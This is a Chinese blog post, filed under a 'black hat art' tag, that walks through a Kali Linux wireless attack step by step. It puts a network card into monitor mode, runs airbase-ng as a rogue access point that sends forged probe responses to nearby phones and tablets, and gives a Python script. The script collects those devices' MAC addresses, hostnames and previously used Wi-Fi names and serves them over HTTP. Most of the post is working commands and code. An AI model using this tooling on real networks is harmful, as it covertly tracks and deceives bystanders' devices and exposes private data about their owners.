Kali Linux渗透之获取主机名、MAC

  • 内容
  • 相关
et_highlighter51

Kali Linux渗透之获取主机名、MAC 黑帽艺术 第1张

初见Kali,就觉得很不一般,于是摸索起来,终于有所领悟。

------Kali Linux无线渗透之主机名、MAC与wifi信息获取------

开启kali,打开终端,键入 ifconfig -a查看网卡信息。

Kali Linux渗透之获取主机名、MAC 黑帽艺术 第2张

键入命令: ifconfig wlan0 up #激活wlan0网卡

airmon-ng check kill #杀死影响进程

airmon-ng start wlan0 #将wlan0置为监听模式

airbase-ng -P -C 30 -v wlan0mon | tee wifi1.txt| #软件虚拟AP,伪造虚假响应包(Probe Response)来回应STA(Wireless station,手机、平板等客户端等)的探测(Probe Request),并将结果保存在wifi1.txt文件中。

Kali Linux渗透之获取主机名、MAC 黑帽艺术 第3张

Kali Linux渗透之获取主机名、MAC 黑帽艺术 第4张

Kali Linux渗透之获取主机名、MAC 黑帽艺术 第5张

运行python脚本,生成两个文件Host.json和Mac.json查看STA的的主机名和mac以及曾经连过的wifi

Kali Linux渗透之获取主机名、MAC 黑帽艺术 第6张

到此,本次任务完成。(喜欢文章 请点击右上方“+关注”)

python脚本如下:

import SimpleHTTPServer
import SocketServer
import threading
import os
import json
from time import sleep
class back(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
def cmd(self,c):
c=os.popen(c).read()
return c
def run(self):
while True:
cmd_=self.cmd("cat /var/wifi1.txt |grep -|awk -F 'from ' '{print$2}'|sort |uniq ").replace('"','').split(' ')
nohup=''
self.cmd("echo > /wifi1.txt ")
x=0
for i in cmd_:
j=' "%d":"%s",' %(x,i)
nohup+= j
x+=1
nohup='{%s}'%nohup[:len(nohup)-1]
cmd_h=self.cmd("cat /var/lib/dhcp/dhcpd.leases|grep host|awk '{print$2}' ").replace('"','').split(' ')
x=0
dhcp=''
for i in cmd_h:
j=' "%d":"%s",' %(x,i)
dhcp+= j
x+=1
dhcp='{%s}'%dhcp[:len(dhcp)-1]
open('Host.json','w').write(dhcp)
open('Mac.json','w').write(nohup)
print dhcp,nohup
print "reading .."
sleep(30)
back().start()
PORT = 8009
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = SocketServer.TCPServer(("", PORT), Handler)
print "serving at port", PORT
httpd.serve_forever()


  • 打赏支付宝扫一扫
  • 打赏微信扫一扫
  • 打赏企鹅扫一扫

本文标签:

版权声明:若无特殊注明,本文皆为《Mushroom》原创,转载请保留文章出处。

本文链接:Kali Linux渗透之获取主机名、MAC - http://www.0xmg.com/post-1559.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注